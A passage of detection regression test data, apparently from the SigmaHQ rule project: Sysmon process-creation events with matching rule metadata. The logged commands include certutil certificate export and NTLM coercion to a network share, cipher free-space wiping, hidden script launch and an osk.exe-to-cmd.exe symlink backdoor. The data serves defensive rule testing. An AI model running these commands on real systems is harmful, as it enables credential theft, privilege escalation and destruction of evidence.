"CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml
================================================
id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 82a6714f-4899-4f16-9c1e-9a333544d4c3
title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:23:42.049726Z"
}
},
"EventRecordID": 11818106,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:23:42.043",
"ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002",
"ProcessId": 2456,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml
================================================
id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5
title: Certificate Exported Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:26:24.815458Z"
}
},
"EventRecordID": 11867155,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:26:24.808",
"ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002",
"ProcessId": 4424,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml
================================================
id: 32397458-1d93-45ee-a3c8-9efebb81d9d1
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 6c6d9280-e6d0-4b9d-80ac-254701b64916
title: Potential NTLM Coercion Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:27:26.975358Z"
}
},
"EventRecordID": 11886324,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:27:26.974",
"ProcessGuid": "5AA13A44-087E-68FD-1A36-000000004002",
"ProcessId": 6788,
"Image": "C:\\Windows\\System32\\chcp.com",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Change CodePage Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CHCP.COM",
"CommandLine": "chcp",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56",
"ParentProcessGuid": "5AA13A44-087E-68FD-1936-000000004002",
"ParentProcessId": 8248,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "cmd.exe /c chcp",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
================================================
id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 7090adee-82e2-4269-bd59-80691e7c6338
title: Console CodePage Lookup Via CHCP
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:28:28.958645Z"
}
},
"EventRecordID": 11905446,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:28:28.957",
"ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002",
"ProcessId": 8208,
"Image": "C:\\Windows\\System32\\chcp.com",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Change CodePage Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CHCP.COM",
"CommandLine": "chcp 936",
"CurrentDirectory": "C:\\Users\\Administrator\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56",
"ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
"ParentProcessId": 3204,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml
================================================
id: a67c0d0c-3b40-4fef-a39d-5bd528255d90
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: c7942406-33dd-4377-a564-0f62db0593a3
title: Suspicious CodePage Switch Via CHCP
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:32:06.432272Z"
}
},
"EventRecordID": 11973062,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:32:06.421",
"ProcessGuid": "5AA13A44-0996-68FD-3A36-000000004002",
"ProcessId": 2876,
"Image": "C:\\Windows\\System32\\cipher.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "File Encryption Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CIPHER.EXE",
"CommandLine": "cipher.exe /w:C:",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml
================================================
id: 18b75b44-f2a5-497f-934c-9d0941f57f0f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 4b046706-5789-4673-b111-66f25fe99534
title: Deleted Data Overwritten Via Cipher.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:33:00.990279Z"
}
},
"EventRecordID": 11989935,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:33:00.989",
"ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002",
"ProcessId": 1060,
"Image": "C:\\Windows\\System32\\clip.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Clip - copies the data into clipboard",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "clip.exe",
"CommandLine": "clip",
"CurrentDirectory": "C:\\Users\\Administrator\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7",
"ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
"ParentProcessId": 3204,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml
================================================
id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: ddeff553-5233-4ae9-bbab-d64d2bd634be
title: Data Copied To Clipboard Via Clip.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:04:38.507492Z"
}
},
"EventRecordID": 8302863,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:04:38.497",
"ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002",
"ProcessId": 7816,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c assoc",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml
================================================
id: 1a0606d6-3470-45e5-aeea-16098357e709
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061
title: Change Default File Association Via Assoc
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:13:54.628884Z"
}
},
"EventRecordID": 8447015,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:13:54.622",
"ProcessGuid": "5AA13A44-CD12-68FC-E62F-000000004002",
"ProcessId": 9088,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c \"dir /s\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml
================================================
id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006
title: File And SubFolder Enumeration Via Dir Command
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-04T07:01:44.982629Z"
}
},
"EventRecordID": 27923,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3116,
"ThreadID": 1656
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-04 07:01:44.963",
"ProcessGuid": "0197231E-31D8-6931-7209-000000000900",
"ProcessId": 13752,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.26100.2454 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"start /b /min C:\\Users\\xodih\\Music\\random.vbs\"",
"CurrentDirectory": "C:\\WINDOWS\\system32\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-BBFB-692F-3C8C-050000000000",
"LogonId": "0x58c3c",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF",
"ParentProcessGuid": "0197231E-BBFF-692F-8200-000000000900",
"ParentProcessId": 5200,
"ParentImage": "C:\\Windows\\explorer.exe",
"ParentCommandLine": "C:\\WINDOWS\\Explorer.EXE",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml
================================================
id: d813db34-f7f0-4713-a419-b491701aa1d1
description: N/A
date: 2025-12-04
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d
title: Cmd Launched with Hidden Start Flags to Suspicious Targets
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:15:18.885132Z"
}
},
"EventRecordID": 8471746,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:15:18.879",
"ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002",
"ProcessId": 8620,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml
================================================
id: 20e20ac5-43f2-40a3-811c-53466d1be222
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: e9b61244-893f-427c-b287-3e708f321c6b
title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
regression_tests_info:
- name: Positive Detection Test
type: evtx
